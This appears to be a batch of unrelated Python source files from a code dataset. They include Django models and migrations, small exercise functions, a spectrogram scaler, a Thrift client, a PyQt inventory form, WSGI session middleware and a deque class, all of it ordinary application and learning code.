print ("input \"end\" if you finish")
input_data = input()
if input_data == "end":
break
else:
keys = MP.make_keys()
hash_tra = hashlib.sha256(input_data.encode("utf-8")).hexdigest()
enc_hash = MP.encrypt(int(hash_tra, 16), keys["key"], keys["mod"])
tra_data = {}
tra_data["title"] = "transaction"
tra_data["requestID"] = address[0] + ":" + str(request_num)
tra_data["mod"] = keys["mod"]
tra_data["contents"] = input_data
tra_data["signature"] = enc_hash
ws_transmission(ws_core, tra_data)
request_num += 1
serverthread.stop()
|
20,730 | 152d08a2d208be1ae0aaf57a76a87e6343f4f6a9 | from django.db import models
from django.utils import timezone
# Create your models here.
class CodeSnippet(models.Model):
created = models.DateTimeField(default=timezone.now())
modified = models.DateTimeField(default=timezone.now())
snippet = models.TextField(blank=False, null=False)
def __str__(self):
""" Sensible string representation of a code snippet."""
return "{0} \n created at: {1} modified at: {2}".format(self.snippet, self.created,
self.modified)
def save(self, *args, **kwargs):
""" Add created_at and updated_at timestamps. """
if not self.id:
self.created = timezone.now()
self.modified = timezone.now()
return super(CodeSnippet, self).save(*args, **kwargs) |
20,731 | 18b3dcb06966686042d0efd4280d69638c186c3f | #diagonals sum kata
#https://www.codewars.com/kata/5592fc599a7f40adac0000a8
def sum_diagonals(matrix):
total = 0
range_vals = list(range(0, len(matrix)))
for i, j in list(zip(range_vals, range_vals[::-1])):
total += matrix[i][i] + matrix [j][i]
return total |
20,732 | 6c51ce92aa52898995d77c25e478130445de8a1f | def circular_shift_list1(lst, k):
length=len(lst)
for i in range(length-k):
lst.append(lst[i])
for i in range(length-k):
lst.pop(0)
return lst
def remove_below_avg(lst):
total=0
for i in lst:
total+=i
avg=total/len(lst)
i=0
while i<len(lst):
if lst[i]<=avg:
lst.remove(lst[i])
else:
i+=1
return lst
def writeName(filename, firstName, lastName):
f=open(filename,'w')
name=firstName+" "+lastName
f.write(name)
f.close()
def writeRandNumbers(filename, n):
import random
f=open(filename, 'w')
for i in range(n):
f.write(str(random.randint(1,100))+"\n")
f.close()
def sumColumn(filename):
f=open(filename, 'r')
total=0
for line in f:
total+=int(line)
return total
|
20,733 | 8f79ecfef52a1b8b6815733bafaba775d12f4216 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-07-26 19:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('APIapp', '0003_auto_20170726_1909'),
]
operations = [
migrations.RenameField(
model_name='map',
old_name='mapImage',
new_name='mapFilePath',
),
]
|
20,734 | 42b98a6d21b68562b29d942e0091c4ee2db756b0 | from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from django.contrib.auth import get_user_model
User = get_user_model()
ADMIN_USERNAME = settings.ADMIN_USERNAME
ADMIN_PASSWORD = settings.ADMIN_PASSWORD
ADMIN_EMAIL = settings.ADMIN_EMAIL
ADMIN_FIREBASE_UID = settings.ADMIN_FIREBASE_UID
class Command(BaseCommand):
help = 'create custom superuser'
def handle(self, *args, **options):
try:
user = User.objects.get(username=ADMIN_USERNAME)
self.stdout.write(self.style.SUCCESS("Superuser already exists"))
except User.DoesNotExist:
try:
User.objects.create_superuser(
username=ADMIN_USERNAME,
email=ADMIN_EMAIL,
password=ADMIN_PASSWORD,
firebase_id=ADMIN_FIREBASE_UID
)
self.stdout.write(self.style.SUCCESS("Created superuser!"))
except Exception as err:
raise CommandError('Error creating superuser: ' + str(err))
|
20,735 | 43eef730ecf6712d5014c6a391db03de191e2a9a | import numpy as np
from keras.utils.np_utils import to_categorical
class SpectScaler:
"""class that scales spectrograms that all have the
same number of frequency bins. Any input spectrogram
will be scaled by subtracting off the mean of each
frequency bin from the 'fit' set of spectrograms, and
then dividing by the standard deviation of each
frequency bin from the 'fit' set.
"""
def __init__(self):
pass
def fit(self, spects):
"""fit a SpectScaler.
takes a 3d array of spectrograms, aligns them all
horizontally, and then rotates to the right 90° so
that the columns are frequency bins. Then finds the
mean and standard deviation of each frequency bin,
which are used by `transform` method to
scale other spects
Parameters
----------
spects : 3-d numpy array
with dimensions (samples, frequency bins, time bins)
"""
if spects.ndim != 3:
raise ValueError('spects should be a 3-d array')
# concatenate all spects then rotate so
# Hz bins are columns, i.e., 'features'
one_long_spect_rotated = np.rot90(np.hstack(spects[:, :, :]))
self.columnMeans = np.mean(one_long_spect_rotated)
self.columnStds = np.std(one_long_spect_rotated)
def _transform(self, spect):
"""
"""
return (spect - self.columnMeans) / self.columnStds
def transform(self, spects):
"""transform spect
"""
if any([not hasattr(self, attr) for attr in ['columnMeans',
'columnStds']]):
raise AttributeError('SpectScaler properties are set to None,'
'must call fit method first to set the'
'value of these properties before calling'
'transform')
if spects.ndim != 3:
raise ValueError('spects should be a 3-d array')
z_norm_spects = np.empty(spects.shape)
for i in range(spects.shape[0]):
z_norm_spects[i, :, :] = self._transform(spects[i, :, :])
return z_norm_spects
def convert_labels_categorical(labelset, labels, return_zero_to_n=False):
"""convert array of labels to matrix of one-hot vectors
where each vector is the training label for a neural net.
Can then be supplied as output to conditional crossentropy
layer. Uses keras.utilts.np_utils.to_categorical
Parameters
----------
labelset : str
labels : vector
return_zero_to_n : bool
if True, returns labels but with values in vector replaced by ints
so that there are zero to n-1 unique ints in the labels_zero_to_n
vector.
Default is False.
Returns
-------
labels_categorical : m x n 2d numpy array
"""
# reshape labels so they match output for neural net
num_syl_classes = np.size(labelset)
# make a dictionary that maps labels to classes 0 to n-1 where n is number of
# classes of syllables.
# Need this map instead of e.g. converting from char to int because
# keras to_categorical function requires
# input where classes are labeled from 0 to n-1
classes_zero_to_n = range(num_syl_classes)
label_map = dict(zip(labelset, classes_zero_to_n))
labels_zero_to_n = np.asarray([label_map[label] for label in labels])
# so we can then convert to array of binary / one-hot vectors for training
if return_zero_to_n:
return to_categorical(labels_zero_to_n, num_syl_classes),\
labels_zero_to_n,\
classes_zero_to_n
else:
return to_categorical(labels_zero_to_n, num_syl_classes)
|
20,736 | 2038bf27c596455243d7ad54365aced111a67157 | import pandas as pd
import numpy as np
#UserInfo.tsv
raw_data=pd.read_csv('dataset/test2.tsv',delimiter='\t',names=["sequence","id", "label", "statement", "subject","speaker","job_title",'state_info',"party","barely_true","false","half_true","mostly_true","pants_on_fire", "venue","justification"],encoding='utf-8')
data = raw_data[[ "label", "statement", "subject","job_title","party","justification"]].copy()
data = data.dropna().reset_index(drop=True)
def remove_special_characters(column):
data[column] = data[column].str.replace('?', '')
data[column] = data[column].str.replace(',', '')
data[column] = data[column].str.replace('.', '')
data[column] = data[column].str.replace('/', '')
data[column] = data[column].str.replace(':', ' ')
data[column] = data[column].str.replace(';', ' ')
data[column] = data[column].str.replace('\"', '')
data[column] = data[column].str.replace('\'', '')
data[column] = data[column].str.replace('[', '')
data[column] = data[column].str.replace(']', '')
data[column] = data[column].str.replace('{', '')
data[column] = data[column].str.replace('}', '')
data[column] = data[column].str.replace('+', '')
data[column] = data[column].str.replace('=', '')
data[column] = data[column].str.replace('-', ' ')
data[column] = data[column].str.replace('_', ' ')
data[column] = data[column].str.replace(')', '')
data[column] = data[column].str.replace('(', '')
data[column] = data[column].str.replace('&', '')
data[column] = data[column].str.replace('@', '')
data[column] = data[column].str.replace('#', '')
data[column] = data[column].str.replace('$', '')
data[column] = data[column].str.replace('%', '')
data[column] = data[column].str.replace('^', '')
data[column] = data[column].str.replace('<', '')
data[column] = data[column].str.replace('>', '')
data[column] = data[column].str.replace('|', '')
data[column] = data[column].str.replace('\\', '')
data[column] = data[column].str.replace('"', '')
data[column] = data[column].str.replace('*', '')
data[column] = data[column].str.replace('~', '')
data[column] = data[column].str.replace('!', '')
data[column] = data[column].str.replace('`', '')
data[column] = data[column].str.replace('0', '')
data[column] = data[column].str.replace('1', '')
data[column] = data[column].str.replace('2', '')
data[column] = data[column].str.replace('3', '')
data[column] = data[column].str.replace('4', '')
data[column] = data[column].str.replace('5', '')
data[column] = data[column].str.replace('6', '')
data[column] = data[column].str.replace('7', '')
data[column] = data[column].str.replace('8', '')
data[column] = data[column].str.replace('9', '')
remove_special_characters("statement")
remove_special_characters("subject")
remove_special_characters("job_title")
remove_special_characters("party")
remove_special_characters("justification")
'''
#loading vordToVec pretrained
def loadGloveModel(gloveFile):
print("Loading Glove Model")
f = open(gloveFile,'r')
model = {}
for line in f:
splitLine = line.split()
word = splitLine[0]
embedding = np.array([float(val) for val in splitLine[1:]])
model[word] = embedding
print("Done.",len(model)," words loaded!")
return model
model = loadGloveModel("glove.6B/glove.6B.100d.txt")
def convert_word_to_vec(column):
count_of_error = 0
count_total_words = 0
final_array = []
for x in data[column].to_numpy():
interim_array = []
words = x.split(" ")
for word in words:
try:
count_total_words = count_total_words +1
temp = model[word.lower()]
interim_array.append(temp)
except KeyError:
count_of_error = count_of_error + 1
continue
final_array.append(interim_array)
np.save(column,final_array)
print("Array Shape", np.array(final_array).shape)
print("Error",count_of_error)
print("Total",count_total_words)
def save_labels():
temp = []
for x in data["label"].to_numpy():
if x == 'pants-fire':
temp.append(0)
elif x == 'false':
temp.append(1)
elif x == 'barely-true':
temp.append(2)
elif x == 'half-true':
temp.append(3)
elif x == 'mostly-true':
temp.append(4)
elif x == 'true':
temp.append(5)
#print(len(temp))
save_labels()
convert_word_to_vec("statement")
convert_word_to_vec("subject")
convert_word_to_vec("job_title")
convert_word_to_vec("justification")
'''
data.to_csv(path_or_buf='dataset/test.tsv', sep='\t')
|
20,737 | 5dee2b6019ed784d7cf5236bee0ab8750af0861b | #!/usr/bin/env python
# coding:utf-8
import logging
from thrift.transport import TSocket, TTransport
from thrift.protocol import TBinaryProtocol
from pyutil.thrift.transport import SmartSocketPool
from ss_thrift_gen.data.rt_counter.CounterQueryManager import Client
from ss_thrift_gen.data.rt_counter.ttypes import *
from pyutil.program.retry_limiter import RetryLimiter
from pyutil.net.get_local_ip import get_local_ip
from ss_thrift_gen.base.ttypes import Base, BaseResp
class RtCounterServiceClient(object):
def __init__(self, product, subsys, module, timeout=0.1, conn_timeout=0.05, retries=1, cluster="data.rt_counter.online"):
self.caller = "%s.%s.%s" % (product, subsys, module)
_transport = SmartSocketPool.TSocketPool(cluster, self.caller, timeout, conn_timeout)
transport = TTransport.TFramedTransport(_transport)
protocol = TBinaryProtocol.TBinaryProtocolAccelerated(transport)
self.client = Client(protocol)
self.client.transport = transport
self.retries = retries
def _call(self, api, req, msg):
retry_limiter = RetryLimiter("counter_service", self.retries)
last_err_msg = ''
while retry_limiter.can_retry():
try:
self.client.transport.open()
fun = getattr(self.client, api)
return fun(req)
except Exception, ex:
last_err_msg = str(ex)
finally:
self.client.transport.close()
logging.warn('failed to %s after %d retries, %s',
msg, retry_limiter.retried(), last_err_msg)
return None
def get_count(self, lookup):
if not lookup.get('counter_names') or not lookup.get('item_ids'):
return []
req = Request(counter_names=lookup.get('counter_names'),
item_ids=lookup.get('item_ids'),
time_slots=lookup.get('time_slots', None),
daily_time_slots=lookup.get('daily_time_slots', None),
secondary_keys=lookup.get('secondary_keys', None), cluster=lookup.get('cluster', 0),
Base=Base(Caller=self.caller, Addr=get_local_ip()))
results = []
try:
resp = self._call('GetCount', req, 'get counter')
if not resp or resp.BaseResp.StatusCode != 0 or not resp.counters:
return results
results.extend([dict(id=count.id, name=count.name, item_id=count.item_id, count=count.count,
time_slot=count.time_slot, daily_time_slot=count.daily_time_slot)
for count in resp.counters])
except Exception, e:
raise e
return results
def write_count(self, counters):
return self._call_write(counters, "WriteCount")
def write_count_oneway(self, counters):
return self._call_write(counters, "WriteCountOneWay")
def _build_write_req(self, counters):
write_req = WriteRequest()
write_req.counters = counters
write_req.Base = Base(Caller=self.caller, Addr=get_local_ip())
return write_req
def _call_write(self, counters, func):
try:
req = self._build_write_req(counters)
resp = self._call(func, req, 'write counter')
if not resp or resp.BaseResp.StatusCode != 0:
return None
except Exception as e:
raise e
return resp
if __name__ == '__main__':
client = RtCounterServiceClient("data", "counter", "pythontest")
item_ids = [12432324, 58273423]
lookup = dict(counter_names=["test_table_name"],
item_ids=item_ids)
# test write
counters = []
# WARN name and table must set equal and special
for item_id in item_ids:
c = Counter()
c.name = "test_table_name"
c.table = "test_table_name"
c.count = 1
c.item_id = item_id
counters.append(c)
client.write_count(counters) # test write sync
client.write_count_oneway(counters) # test write oneway
# test read
counters = client.get_count(lookup)
for counter in counters:
print counter['name'], counter['count'], counter['id'], counter['item_id'], counter['time_slot'], counter[
'daily_time_slot']
|
20,738 | efa1a0ff4f49a7f8f79f5fb09be84b34dfca6e48 | import os
from whoosh import index
|
20,739 | c1c6a59acca2f89364d42cb922cb01e09799f611 | # -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 15:33:40 2019
@author: DELL PC
"""
def song():
print("Old town road" )
song()
def artist():
print("Lil Nas X") # using print action inside the funtion
artist() # when we call this funtion the result of the attribute is shown in the output
def year():
print("2019")
year()
# below there is a example for boolean
one = []
print(one,'is',bool(one))
two = [0]
print(two,'is',bool(two))
three = 0.0
print(three,'is',bool(three))
four = None
print(four,'is',bool(four))
five = True
print(five,'is',bool(five))
six = 'Easy string'
print(six,'is',bool(six)) |
20,740 | f30c0beff0b63f2ce9ac37c1b662ed547d0958b1 | #Exercise 3
#Write a program to read through a mail log, build a histogram using a dictionary
#to count how many messages have come from each email address, and print the dictionary
fname=input('Enter a file name: ')
fhand=open(fname)
new=dict()
for line in fhand:
if line.startswith('From'):
words=line.split()
if len(words)>3:
email=words[1]
if email not in new:
new[email]=1
else:
new[email]+=1
print(new)
|
20,741 | 59d2906bb3c9e4c4393ce248b6ae85b8393f63b2 | from api.sources.getter_definition import GetterDefinition
class CptecAPIGetter(GetterDefinition):
def __init__(self, latitude, longitude):
config = {
'url': 'http://servicos.cptec.inpe.br/XML/cidade/7dias/{0}/{1}/previsaoLatLon.xml',
'parser': 'xml'
}
GetterDefinition.__init__(self, config, latitude, longitude)
|
20,742 | 340c2139c6dbd95aa9fd4345c10246d97734ecc7 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'E:\PROGRAMMING\DESKTOP-APP\Inventory_System_via_QRcode [TUP-C_UITC]\GUI [UI_FILES]\addremoveitem.ui'
#
# Created by: PyQt5 UI code generator 5.15.1
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_addremoveitemWindow(object):
def setupUi(self, addremoveitemWindow):
addremoveitemWindow.setObjectName("addremoveitemWindow")
addremoveitemWindow.resize(501, 671)
addremoveitemWindow.setGeometry(700, 120, 501, 671)
font = QtGui.QFont()
font.setPointSize(7)
addremoveitemWindow.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("E:\\PROGRAMMING\\DESKTOP-APP\\Inventory_System_via_QRcode [TUP-C_UITC]\\GUI [UI_FILES]\\icons/INVENTORY.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
addremoveitemWindow.setWindowIcon(icon)
addremoveitemWindow.setStyleSheet("background-color: rgb(223, 223, 223);")
self.centralwidget = QtWidgets.QWidget(addremoveitemWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButtonUpdateinventoryConfirm = QtWidgets.QPushButton(self.centralwidget)
self.pushButtonUpdateinventoryConfirm.setEnabled(False)
self.pushButtonUpdateinventoryConfirm.setGeometry(QtCore.QRect(70, 530, 361, 70))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pushButtonUpdateinventoryConfirm.sizePolicy().hasHeightForWidth())
self.pushButtonUpdateinventoryConfirm.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(21)
font.setBold(True)
font.setWeight(75)
font.setStrikeOut(False)
font.setKerning(False)
self.pushButtonUpdateinventoryConfirm.setFont(font)
self.pushButtonUpdateinventoryConfirm.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pushButtonUpdateinventoryConfirm.setStyleSheet("background-color: rgb(195, 29, 57);\n"
"color: rgb(255, 255, 255);")
self.pushButtonUpdateinventoryConfirm.setObjectName("pushButtonUpdateinventoryConfirm")
self.labelUpdateInventoryTitle = QtWidgets.QLabel(self.centralwidget)
self.labelUpdateInventoryTitle.setGeometry(QtCore.QRect(120, 210, 281, 31))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setWeight(75)
self.labelUpdateInventoryTitle.setFont(font)
self.labelUpdateInventoryTitle.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
self.labelUpdateInventoryTitle.setObjectName("labelUpdateInventoryTitle")
self.labelUpdateInventoryLogo = QtWidgets.QLabel(self.centralwidget)
self.labelUpdateInventoryLogo.setGeometry(QtCore.QRect(210, 100, 100, 100))
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.labelUpdateInventoryLogo.sizePolicy().hasHeightForWidth())
self.labelUpdateInventoryLogo.setSizePolicy(sizePolicy)
self.labelUpdateInventoryLogo.setStyleSheet("image: url(:/icons/icons/BOX.png);\n"
"background-color: rgb(48, 48, 48);\n"
"border-radius: 10px;")
self.labelUpdateInventoryLogo.setText("")
self.labelUpdateInventoryLogo.setObjectName("labelUpdateInventoryLogo")
self.pusButtonUpdateInventoryBack = QtWidgets.QPushButton(self.centralwidget)
self.pusButtonUpdateInventoryBack.setGeometry(QtCore.QRect(20, 20, 75, 23))
font = QtGui.QFont()
font.setPointSize(10)
self.pusButtonUpdateInventoryBack.setFont(font)
self.pusButtonUpdateInventoryBack.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pusButtonUpdateInventoryBack.setStyleSheet("background-color: rgb(195, 29, 57);\n"
"color: rgb(255, 255, 255);")
self.pusButtonUpdateInventoryBack.setObjectName("pusButtonUpdateInventoryBack")
self.comboBoxUpdateInventoryEquipment = QtWidgets.QComboBox(self.centralwidget)
self.comboBoxUpdateInventoryEquipment.setEnabled(True)
self.comboBoxUpdateInventoryEquipment.setGeometry(QtCore.QRect(70, 370, 361, 40))
self.comboBoxUpdateInventoryEquipment.setStyleSheet("color: rgb(0, 0, 0);\n"
"background-color: rgb(255, 255, 255);\n"
"editable: rgb(65, 65, 65);")
self.comboBoxUpdateInventoryEquipment.setEditable(False)
self.comboBoxUpdateInventoryEquipment.setCurrentText("")
self.comboBoxUpdateInventoryEquipment.setMaxVisibleItems(50)
self.comboBoxUpdateInventoryEquipment.setInsertPolicy(QtWidgets.QComboBox.InsertAtBottom)
self.comboBoxUpdateInventoryEquipment.setObjectName("comboBoxUpdateInventoryEquipment")
self.spinBoxUpdateInventoryQty = QtWidgets.QSpinBox(self.centralwidget)
self.spinBoxUpdateInventoryQty.setEnabled(False)
self.spinBoxUpdateInventoryQty.setGeometry(QtCore.QRect(70, 460, 361, 40))
font = QtGui.QFont()
font.setPointSize(15)
self.spinBoxUpdateInventoryQty.setFont(font)
self.spinBoxUpdateInventoryQty.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.spinBoxUpdateInventoryQty.setStyleSheet("\n"
"color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
self.spinBoxUpdateInventoryQty.setButtonSymbols(QtWidgets.QAbstractSpinBox.PlusMinus)
self.spinBoxUpdateInventoryQty.setMinimum(1)
self.spinBoxUpdateInventoryQty.setMaximum(50)
self.spinBoxUpdateInventoryQty.setObjectName("spinBoxUpdateInventoryQty")
self.labelUpdateInventoryQty = QtWidgets.QLabel(self.centralwidget)
self.labelUpdateInventoryQty.setGeometry(QtCore.QRect(70, 430, 161, 20))
self.labelUpdateInventoryQty.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
self.labelUpdateInventoryQty.setObjectName("labelUpdateInventoryQty")
self.labelUpdateInventoryCard = QtWidgets.QLabel(self.centralwidget)
self.labelUpdateInventoryCard.setGeometry(QtCore.QRect(20, 60, 461, 591))
self.labelUpdateInventoryCard.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"border-radius: 10px;")
self.labelUpdateInventoryCard.setText("")
self.labelUpdateInventoryCard.setObjectName("labelUpdateInventoryCard")
self.groupBoxUpdateInventoryChooseaction = QtWidgets.QGroupBox(self.centralwidget)
self.groupBoxUpdateInventoryChooseaction.setGeometry(QtCore.QRect(70, 270, 361, 51))
self.groupBoxUpdateInventoryChooseaction.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.groupBoxUpdateInventoryChooseaction.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
self.groupBoxUpdateInventoryChooseaction.setObjectName("groupBoxUpdateInventoryChooseaction")
self.radioButtonUpdateInventoryAdditem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
self.radioButtonUpdateInventoryAdditem.setGeometry(QtCore.QRect(30, 20, 111, 17))
self.radioButtonUpdateInventoryAdditem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
self.radioButtonUpdateInventoryAdditem.setObjectName("radioButtonUpdateInventoryAdditem")
self.radioButtonUpdateInventoryDeleteItem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
self.radioButtonUpdateInventoryDeleteItem.setGeometry(QtCore.QRect(250, 20, 91, 17))
self.radioButtonUpdateInventoryDeleteItem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
self.radioButtonUpdateInventoryDeleteItem.setObjectName("radioButtonUpdateInventoryDeleteItem")
self.radioButtonUpdateInventoryUpdateItem = QtWidgets.QRadioButton(self.groupBoxUpdateInventoryChooseaction)
self.radioButtonUpdateInventoryUpdateItem.setGeometry(QtCore.QRect(130, 20, 111, 17))
self.radioButtonUpdateInventoryUpdateItem.setStyleSheet("color: rgb(255, 255, 255);\n"
"background-color: rgb(65, 65, 65);")
self.radioButtonUpdateInventoryUpdateItem.setObjectName("radioButtonUpdateInventoryUpdateItem")
self.labelUpdateInventoryEquipment = QtWidgets.QLabel(self.centralwidget)
self.labelUpdateInventoryEquipment.setGeometry(QtCore.QRect(70, 350, 61, 20))
self.labelUpdateInventoryEquipment.setStyleSheet("background-color: rgb(48, 48, 48);\n"
"color: rgb(255, 255, 255);")
self.labelUpdateInventoryEquipment.setObjectName("labelUpdateInventoryEquipment")
self.labelUpdateInventoryCard.raise_()
self.pushButtonUpdateinventoryConfirm.raise_()
self.labelUpdateInventoryTitle.raise_()
self.labelUpdateInventoryLogo.raise_()
self.pusButtonUpdateInventoryBack.raise_()
self.comboBoxUpdateInventoryEquipment.raise_()
self.spinBoxUpdateInventoryQty.raise_()
self.labelUpdateInventoryQty.raise_()
self.groupBoxUpdateInventoryChooseaction.raise_()
self.labelUpdateInventoryEquipment.raise_()
addremoveitemWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(addremoveitemWindow)
QtCore.QMetaObject.connectSlotsByName(addremoveitemWindow)
addremoveitemWindow.setTabOrder(self.comboBoxUpdateInventoryEquipment, self.spinBoxUpdateInventoryQty)
addremoveitemWindow.setTabOrder(self.spinBoxUpdateInventoryQty, self.pushButtonUpdateinventoryConfirm)
addremoveitemWindow.setTabOrder(self.pushButtonUpdateinventoryConfirm, self.pusButtonUpdateInventoryBack)
def retranslateUi(self, addremoveitemWindow):
_translate = QtCore.QCoreApplication.translate
addremoveitemWindow.setWindowTitle(_translate("addremoveitemWindow", "Update Inventory - TUP-C UITC INVENTORY SYSTEM"))
self.pushButtonUpdateinventoryConfirm.setText(_translate("addremoveitemWindow", "CONFIRM"))
self.labelUpdateInventoryTitle.setText(_translate("addremoveitemWindow", "UPDATE INVENTORY"))
self.pusButtonUpdateInventoryBack.setText(_translate("addremoveitemWindow", "BACK"))
self.labelUpdateInventoryQty.setText(_translate("addremoveitemWindow", "Enter Quantity: (Max. Qty is 50)"))
self.groupBoxUpdateInventoryChooseaction.setTitle(_translate("addremoveitemWindow", "Choose Action"))
self.radioButtonUpdateInventoryAdditem.setText(_translate("addremoveitemWindow", "Add Item"))
self.radioButtonUpdateInventoryDeleteItem.setText(_translate("addremoveitemWindow", "Delete Item"))
self.radioButtonUpdateInventoryUpdateItem.setText(_translate("addremoveitemWindow", "Update Item"))
self.labelUpdateInventoryEquipment.setText(_translate("addremoveitemWindow", "Equipment:"))
import icons
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
addremoveitemWindow = QtWidgets.QMainWindow()
ui = Ui_addremoveitemWindow()
ui.setupUi(addremoveitemWindow)
addremoveitemWindow.show()
sys.exit(app.exec_())
|
20,743 | 6791476dec7e2b70f02875251c8cd0d919fc2aa3 | import win32clipboard as clip
import win32con
clip.OpenClipboard()
print clip.GetClipboardData(win32con.CF_TEXT)
clip.CloseClipboard()
|
20,744 | c55b96a6476a675b772dbe2f28cf13018622ab7e | # Generated by Django 2.0.5 on 2018-06-09 17:27
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0002_auto_20180609_1632'),
]
operations = [
migrations.RenameField(
model_name='accountsmodel',
old_name='Type_of_Description',
new_name='Type',
),
]
|
20,745 | 440d2321beb413e104340f699370b21a72f8c1ce | import inspect
import uuid
try:
from Cookie import SimpleCookie
except ImportError:
from http.cookies import SimpleCookie
class BaseSessionMeta(type):
def __new__(meta, name, bases, class_dict):
# Don’t validate the abstract BaseSession class
if bases != (object,):
for item in ['__setitem__', '__getitem__', '__contains__']:
method = class_dict.get(item)
if not method or not inspect.isfunction(method):
raise ValueError(
'{} must define a method called {}'.format(name, item))
return type.__new__(meta, name, bases, class_dict)
class BaseSession(object, metaclass=BaseSessionMeta):
pass
class DictBasedSessionManager(BaseSession):
sessions = {}
def __setitem__(self, id, data):
self.sessions[id] = data
def __getitem__(self, id):
if id in self.sessions:
return self.sessions[id]
def __contains__(self, id):
if id in self.sessions:
return True
else:
return False
class Session(object):
__slots__ = ('id', 'data')
def __init__(self):
self.id = None
self.data = {}
def __setitem__(self, key, value):
self.data[key] = value
def __getitem__(self, key):
return self.data[key]
def get(self, key, default=None):
if key in self.data:
return self.data[key]
return default
class SimpleSession(object):
__slots__ = ('id', 'data', 'manager')
def __init__(self, manager_inst):
self.id = None
self.data = {}
self.manager = manager_inst
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
def get(self, key, default=None):
if key in self.data:
return self.data[key]
return default
def load(self, id):
if id in self.manager:
self.data = self.manager[id]
self.id = id
else:
self.data = {}
self.id = uuid.uuid4().hex
def save(self):
self.manager[self.id] = self.data
return self.id
class SimpleSessionMiddleware(object):
"""
This class uses the manager attribute instead of a wrapping
function factory.
The manager is an instance of a simple class with magic attribute
which is easy to understand and extend.
"""
def __init__(self, app, session_manager=DictBasedSessionManager,
env_key='wsgisession', cookie_key='session_id'):
self.app = app
self.env_key = env_key
self.cookie_key = cookie_key
self.manager = session_manager()
def __call__(self, environ, start_response):
cookie = SimpleCookie()
if 'HTTP_COOKIE' in environ:
cookie.load(environ['HTTP_COOKIE'])
id = None
if self.cookie_key in cookie:
id = cookie[self.cookie_key].value
session = SimpleSession(self.manager)
session.load(id)
environ[self.env_key] = session
def middleware_start_response(status, response_headers, exc_info=None):
session = environ[self.env_key]
session.save()
cookie = SimpleCookie()
cookie[self.cookie_key] = session.id
cookie[self.cookie_key]['path'] = '/'
cookie_string = cookie[self.cookie_key].OutputString()
response_headers.append(('Set-Cookie', cookie_string))
return start_response(status, response_headers, exc_info)
return self.app(environ, middleware_start_response)
class SessionMiddleware(object):
def __init__(self, app, factory,
env_key='wsgisession', cookie_key='session_id'):
self.app = app
self.factory = factory
self.env_key = env_key
self.cookie_key = cookie_key
def __call__(self, environ, start_response):
cookie = SimpleCookie()
if 'HTTP_COOKIE' in environ:
cookie.load(environ['HTTP_COOKIE'])
id = None
if self.cookie_key in cookie:
id = cookie[self.cookie_key].value
environ[self.env_key] = self.factory.load(id)
def middleware_start_response(status, response_headers, exc_info=None):
id = self.factory.save(environ[self.env_key])
cookie = SimpleCookie()
cookie[self.cookie_key] = id
cookie[self.cookie_key]['path'] = '/'
cookie_string = cookie[self.cookie_key].OutputString()
response_headers.append(('Set-Cookie', cookie_string))
return start_response(status, response_headers, exc_info)
return self.app(environ, middleware_start_response)
|
20,746 | 5ef8c16bd1a71a5f37106533d257d836182a9164 | #!/usr/bin/python3
# -*-coding:utf-8-*-
# theta = theta - alpha * cost'(theta)
# theta = theta - alpha * ((1/m)*((hypothesis(theta*x)-y)*x))
import costFunc_linear
import hypothesis_linear as hFunc
def gradient_descent(x, y, theta, alpha, iterations):
m = len(y)
for i in range(iterations):
theta = theta - (alpha/m)*x.T*(hFunc.hypothesis_func(x, theta) - y)
return theta
|
20,747 | 871e066f4d71c0cc6c2c44fda2bc5329f3dcda91 | import csv
filename = 'sitka_weather_07-2014.csv'
with open(filename) as file_object:
reader = csv.reader(file_object)
header_row = next(reader)
for index, column_header in enumerate(header_row):
print(index, column_header)
# print("\nKey: " + str(index))
# print("Value: " + column_header) |
20,748 | 7e2ed6cbdeb0d02c014991205f46dc5c095bfc7a | from Deque import Deque
class Array_Deque(Deque):
def __init__(self):
# capacity starts at 1; we will grow on demand.
self.__capacity = 1
self.__size = 0
self.__contents = [None] * self.__capacity
self.__front=0
self.__back=0
def __str__(self):
if self.__size == 0:
string='[ ]'
else:
string = '[ '
for i in range(self.__size-1):
x = (self.__front + i) % len(self.__contents)
string += str(self.__contents[x])
string += ", "
